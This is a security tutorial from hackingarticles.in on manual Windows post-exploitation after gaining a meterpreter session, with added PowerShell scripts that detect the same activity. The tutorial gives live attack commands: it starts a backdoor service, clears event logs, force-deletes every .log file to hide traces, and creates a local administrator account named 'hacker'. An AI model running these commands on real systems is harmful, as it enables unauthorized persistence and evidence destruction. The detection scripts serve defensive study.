Manual Post Exploitation on Windows PC (System Command)
This article is about post exploitation on the victim's system using the Windows command line. When an attacker gains a meterpreter session on a remote PC, he or she can enumerate a large amount of information and make effective changes using knowledge of the Windows command line.
Requirement
Attacker: Kali Linux
Target: Windows PC
To execute this, we will first obtain a meterpreter session on the remote PC, which you can learn from here. After gaining the session, escalate its privileges to Administrator, which you can learn from here.
Now, to access the Windows command line, type ‘shell’ in the meterpreter session.
Let’s Start!!
Obtain User Details and its Privileges
After gaining the meterpreter shell or Windows command line, and before doing any other work, it is important to know the current user. This command is usually used to verify that the account we were trying to access is the one we got. This can be done simply with the command whoami.
To increase our reach, we will use an option of the “whoami” command:
[/all]: To show all the details about the user.
Example: whoami /all
As seen below, we have the username, SID and local group details.
We also obtain details of the privileges that are enabled or disabled for the user we are currently logged on as.
Obtain the System Info
This command helps us enumerate lots of information regarding the system like hostname, domain, time zone and much more.
Example: systeminfo
We can filter out the basic system details (manufacturer, build and model) of the victim’s system using findstr.
Example: systeminfo | findstr System
As shown in the below screenshot we have the Boot Time, Manufacturer, Model, Type, Directory and Language of the Victim’s System.
We can obtain the approximate location (roughly to the country level) of the victim’s system using systeminfo.
Here we are using findstr with systeminfo to filter the systeminfo results.
Example: systeminfo | findstr Time
As shown in the below screenshot we have the Time Zone (UTC+05:30), so we can say that the victim’s System is in “INDIA”.
Obtain Memory Details (Physical, Virtual, In Use, Free)
We can Obtain the basic memory details of the victim’s System using systeminfo.
Here we are using findstr with systeminfo to filter the systeminfo results.
Example: systeminfo | findstr Memory
As shown in the below screenshot, we have the Total Physical Memory of 3.5 GB, out of which 1.6 GB is available; we also obtain the virtual memory details.
Obtain the List of System Drivers
We can display a list of all installed device drivers on the victim’s system and their properties through the command called driverquery.
Example: driverquery
Obtain the List of Kernel Drivers
We can obtain the list of kernel drivers on the victim’s system using driverquery.
Here we are using findstr with driverquery to filter the driverquery results.
Example: driverquery | findstr Kernel
As seen below we have obtained a list of kernel drivers which can be used to get the direct exploits to the Victim’s System.
Obtain the List of File System Drivers
We can obtain the list of file system drivers on the victim’s system using driverquery.
Here we are using findstr with driverquery to filter the driverquery results.
Example: driverquery | findstr "File System"
Display Info about a Particular Service
We can obtain information about a particular service using the sc command. Here we are using the following option with the sc command:
[query] to obtain information about a service.
Syntax: sc query [service name]
Example: sc query wuauserv
Obtain the list of Active Tasks
We can obtain information about running tasks using tasklist command.
This command shows the name of the task running along with the Process ID (PID), Session Name, Session Number and Memory Usage.
Syntax: tasklist
We can filter the output of tasklist by loaded module using the following option of the tasklist command:
[/m]: To specify the Modules in Tasklist
But we will have to mention the module which is to be used to sort the Tasklist.
Syntax: tasklist /m [Module Name]
Example: tasklist /m ntdll.dll
Here we can see all the tasks linked with ntdll.dll module.
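Each of the enumeration commands above (whoami /all, systeminfo, driverquery, sc query, tasklist /m) is ordinary administrator noise on its own; what gives a hands-on-keyboard session away is several of them from the same account within a few minutes. The following PowerShell is an added example written for this page (it is not part of the original article) showing how a defender can hunt for that burst in process-creation telemetry. It assumes Security event 4688 is being logged with "Include command line in process creation events" enabled; the pattern list, the window/threshold values and the sample records are constructed for illustration.

```powershell
# Added example (not from the original article): spot a burst of the
# reconnaissance one-liners above in Windows process-creation telemetry.
# Assumes Security event 4688 with command-line logging enabled
# (Audit Process Creation + "Include command line in process creation events").

# Constructed regex list for the enumeration commands shown so far.
$ReconPatterns = @(
    '\bwhoami(\.exe)?\s+/all',
    '\bsysteminfo(\.exe)?',
    '\bdriverquery(\.exe)?',
    '\bsc(\.exe)?\s+query',
    '\btasklist(\.exe)?\s+/m'
)

# Pull 4688 events and flatten the fields we need. The event XML is parsed by
# field name so the code does not depend on positional Properties[] indexes.
function Get-ProcessCreationRecords {
    param([datetime]$Since = (Get-Date).AddHours(-24))
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $field = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $field[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = $field['SubjectUserName']
                Process     = $field['NewProcessName']
                CommandLine = $field['CommandLine']
            }
        }
}

# Flag any user who ran at least $Threshold distinct recon commands inside a
# sliding window of $WindowMinutes. One systeminfo is noise; four different
# enumeration commands in five minutes is worth a look.
function Find-ReconBursts {
    param(
        [Parameter(Mandatory)][object[]]$Records,
        [int]$WindowMinutes = 5,
        [int]$Threshold = 3
    )
    $hits = foreach ($r in $Records) {
        if (-not $r.CommandLine) { continue }
        foreach ($p in $ReconPatterns) {
            if ($r.CommandLine -match $p) {
                [pscustomobject]@{ Time = $r.Time; User = $r.User; Pattern = $p; CommandLine = $r.CommandLine }
                break
            }
        }
    }
    foreach ($group in ($hits | Group-Object User)) {
        $sorted = @($group.Group | Sort-Object Time)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $end = $sorted[$i].Time.AddMinutes($WindowMinutes)
            $window = @($sorted | Where-Object { $_.Time -ge $sorted[$i].Time -and $_.Time -le $end })
            $distinct = @($window.Pattern | Sort-Object -Unique).Count
            if ($distinct -ge $Threshold) {
                [pscustomobject]@{
                    User     = $group.Name
                    Start    = $sorted[$i].Time
                    Distinct = $distinct
                    Commands = ($window.CommandLine -join ' ; ')
                }
                break   # one alert per user is enough for triage
            }
        }
    }
}

# Constructed sample records (not real telemetry) so the logic can be exercised
# offline; on a live Windows host feed it Get-ProcessCreationRecords instead.
$t0 = Get-Date '2024-01-01T10:00:00'
$Sample = @(
    [pscustomobject]@{ Time = $t0;               User = 'alice'; Process = 'C:\Windows\System32\systeminfo.exe';  CommandLine = 'systeminfo' }
    [pscustomobject]@{ Time = $t0.AddMinutes(1); User = 'svc';   Process = 'C:\Windows\System32\whoami.exe';      CommandLine = 'whoami /all' }
    [pscustomobject]@{ Time = $t0.AddMinutes(2); User = 'svc';   Process = 'C:\Windows\System32\systeminfo.exe';  CommandLine = 'systeminfo | findstr Time' }
    [pscustomobject]@{ Time = $t0.AddMinutes(3); User = 'svc';   Process = 'C:\Windows\System32\driverquery.exe'; CommandLine = 'driverquery | findstr Kernel' }
    [pscustomobject]@{ Time = $t0.AddMinutes(4); User = 'svc';   Process = 'C:\Windows\System32\tasklist.exe';    CommandLine = 'tasklist /m ntdll.dll' }
)

Find-ReconBursts -Records $Sample | Format-Table -AutoSize
```

With the constructed sample, only the svc account crosses the threshold (four distinct patterns inside the window), while alice's single systeminfo is ignored. The threshold and window are the knobs to tune against your own baseline of administrator activity.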
Killing Tasks
We can kill tasks on the Victim’s System using a command called taskkill.
Taskkill requires either one of two things:
- Process Id
- Task Name
Here we are going to use [/f] option in taskkill, it enables the Taskkill to forcefully kill the tasks.
Killing the Tasks using the Process ID
Syntax: taskkill /f /pid [Process id of Task]
Example: taskkill /f /pid 7236
Killing the Tasks using the Task Name
Syntax: taskkill /f /im "[Task Name]"
Example: taskkill /f /im "Taskmgr.exe"
Start or Stopping Services
We can start a service or some backdoor without the knowledge of the Victim using sc command.
Here we are using following options with sc command:
[start] to start a service.
Syntax:sc start [Service Name]
Example: sc start TeamViewer
As you can see in the below image the service has started.
We can also stop a service using the sc command. Here we are using the following option with the sc command:
[stop] to stop a service.
Syntax: sc stop [Service Name]
Example: sc stop TeamViewer
As you can see in the below image, the service has stopped.
List all the logs on the System
We can obtain a list of all the logs on a system using wevtutil command. Here we are using following options with wevtutil command:
[el] to List log names.
Example: wevtutil el
Clear a specific log on the System
We can clear a specific log on a system using the wevtutil command. Here we are using the following option with the wevtutil command:
[cl] to clear the named log.
Syntax: wevtutil cl [log name]
Example: wevtutil cl System
Find all the Hard Disk/Storage Partitions on a System
While penetration testing a Remote PC, knowledge of all the Hard Disk or Storage Devices and Partitions is essential so that we can sweep all the partitions and Storage Devices in hope to find data of any particular importance.
This can be done using fsutil command. Here we are using following options with fsutil command:
[fsinfo] to view file system info.
[drives] to list all drives.
Example: fsutil fsinfo drives
As you can see below that the Victim System has 4 Hard Disk Partitions C, D, E and F
Delete all logs on a System
While penetration testing a remote PC, it is essential to remove the trace of your activities, so we need to remove the evidence of our presence, which can be found in log files.
Log files carry the .log extension, so we are going to sweep the system directory for files with the extension .log and delete them with the del command.
Note: Use this command with the path set to System Directory (In my case it is C:\)
Here we are using following options with del command:
[/a] to select files based on attributes.
[/s] to select System Files (/s is an attribute so it is to be used after /a)
[/q] to use Quiet Mode (It doesn’t ask if Ok to delete on global wildcards)
[/f] to force delete the read only files
Syntax: del [Directory]\*.log /a /s /q /f
Example: del \*.log /a /s /q /f
As you can see in the below screenshot the process of detecting and deleting the files with .log extension has started.
Manage Local Users
While penetration testing a remote PC, it is important to obtain the list of local users so that the attacker can gain information about the various users assigned to that particular system.
This can be done using the net command. Here we are using the following option with the net command:
[user] to display the list of local users
Example: net user
It is always advantageous to add a user in the Local Groups so that attacker can perform certain tasks on that system.
This can be done using net command. Here we are using following options with net command:
Syntax:net user [logon_name] [password] /add
Example: net user hacker pass123 /add
Many times we come across a situation where we will have to perform certain administrative tasks, so we will add the user we created to the local Administrators group.
Here we are using the following option with the net command:
[localgroup] to select the list of local groups
Syntax: net localgroup administrators [logon_name] /add
Example: net localgroup administrators hacker /add
In the above example, I have added a user named hacker to the local administrators group. We can verify this using the “net user” command.
Now, during the clean-up process it is important to delete the local user created.
This can be done using the net command. Here we are using the following option with the net command:
Syntax: net user [logon_name] /del
Example: net user hacker /del
Here you can see that I have used the net command to add a user, make it a member of the local administrators group and then delete that user.
Display the List of all Scheduled Tasks
While penetration testing a remote PC, it is necessary to know the scheduled tasks to plan the attacks accordingly to further penetrate the Victim’s System. This can be done using schtasks.
We can sort schtasks so as to obtain a better readable format i.e. in a List Format.
Here we are using following options with schtasks command:
[/query] to display all scheduled tasks
[/fo] to specify the format of the Output (In this case we use List)
[/v] to use verbose mode
Example: schtasks /query /fo LIST /v
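The state-changing steps in this article (wevtutil cl, net user /add and /del, net localgroup /add, sc start and sc stop) each leave a standard Windows event behind, and the .log sweep above does not reach them: the Windows Event Log channels are .evtx files, and clearing one with wevtutil cl itself records event 1102 (Security) or 104 (any other log). The PowerShell below is an added example written for this page, not the article's own code, that collects those records in one place for review. It assumes a Windows host with the "Audit User Account Management", "Audit Security Group Management" and "Audit Other Object Access Events" subcategories enabled (for 4720/4726/4732 and 4698 respectively); the watch list and its wording are constructed here.

```powershell
# Added example (not part of the original article): gather the Windows event
# records left behind by the state-changing commands in this article (log
# clearing, local account and group changes, service start/stop, scheduled
# tasks). The IDs are the standard Windows audit and Service Control Manager
# event IDs; the account-related ones require the matching audit subcategories.

# Constructed watch list: which log each ID lives in and what it indicates.
$WatchList = @(
    [pscustomobject]@{ Log = 'Security'; Id = 1102; Meaning = 'Security log cleared (wevtutil cl Security)' }
    [pscustomobject]@{ Log = 'System';   Id = 104;  Meaning = 'Another log cleared (wevtutil cl <log>), from provider Microsoft-Windows-Eventlog' }
    [pscustomobject]@{ Log = 'Security'; Id = 4720; Meaning = 'Local user created (net user <name> <password> /add)' }
    [pscustomobject]@{ Log = 'Security'; Id = 4726; Meaning = 'Local user deleted (net user <name> /del)' }
    [pscustomobject]@{ Log = 'Security'; Id = 4732; Meaning = 'Member added to a local group (net localgroup administrators <name> /add)' }
    [pscustomobject]@{ Log = 'Security'; Id = 4698; Meaning = 'Scheduled task created' }
    [pscustomobject]@{ Log = 'System';   Id = 7045; Meaning = 'New service installed' }
    [pscustomobject]@{ Log = 'System';   Id = 7036; Meaning = 'Service changed state (sc start / sc stop); noisy, filter on the service name' }
)

# Translate a (log, id) pair into its watch-list meaning, or $null if not watched.
function Resolve-WatchMeaning {
    param([string]$Log, [int]$Id)
    ($WatchList | Where-Object { $_.Log -eq $Log -and $_.Id -eq $Id } | Select-Object -First 1).Meaning
}

# Query each log once for all of its watched IDs and return flat records.
function Get-TamperEvents {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    if (-not (Get-Command Get-WinEvent -ErrorAction SilentlyContinue)) {
        Write-Warning 'Get-WinEvent is only available on Windows hosts.'
        return
    }
    foreach ($logName in ($WatchList.Log | Sort-Object -Unique)) {
        $ids = @($WatchList | Where-Object Log -eq $logName | ForEach-Object Id)
        Get-WinEvent -FilterHashtable @{ LogName = $logName; Id = $ids; StartTime = $Since } -ErrorAction SilentlyContinue |
            ForEach-Object {
                $evt = $_
                $xml = [xml]$evt.ToXml()
                $fields = @{}
                # Security audit events and SCM events carry their details in EventData.
                foreach ($d in $xml.Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
                # 1102 and 104 use a UserData/LogFileCleared payload instead.
                $cleared = $xml.Event.UserData.LogFileCleared
                if ($cleared) {
                    $fields['SubjectUserName'] = $cleared.SubjectUserName
                    $fields['TargetUserName']  = $cleared.Channel
                }
                # Target: the account acted on (4720/4726/4732), the cleared channel
                # (104), or the service name carried in param1 (7036/7045).
                $target = $fields['TargetUserName']
                if (-not $target) { $target = $fields['param1'] }
                [pscustomobject]@{
                    Time    = $evt.TimeCreated
                    Log     = $logName
                    Id      = $evt.Id
                    Actor   = $fields['SubjectUserName']
                    Target  = $target
                    Meaning = Resolve-WatchMeaning -Log $logName -Id $evt.Id
                }
            }
    }
}

Get-TamperEvents | Sort-Object Time | Format-Table Time, Id, Actor, Target, Meaning -AutoSize
```

A cleared log in the middle of a run of account and service changes is the pattern to look for: the 1102 or 104 record survives the clearing because it is written as the first entry of the fresh log, and a 4720 followed by a 4732 for the same Target name within seconds mirrors the net user / net localgroup sequence shown above. Forwarding these channels to a collector before they can be cleared is what makes the check reliable.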
Author: Pavandeep Singh is an Ethical Hacker, Web Penetration Tester, Windows Command Line Expert and Researcher at hackingarticles.in. Contact here
Source: www.hackingarticles.in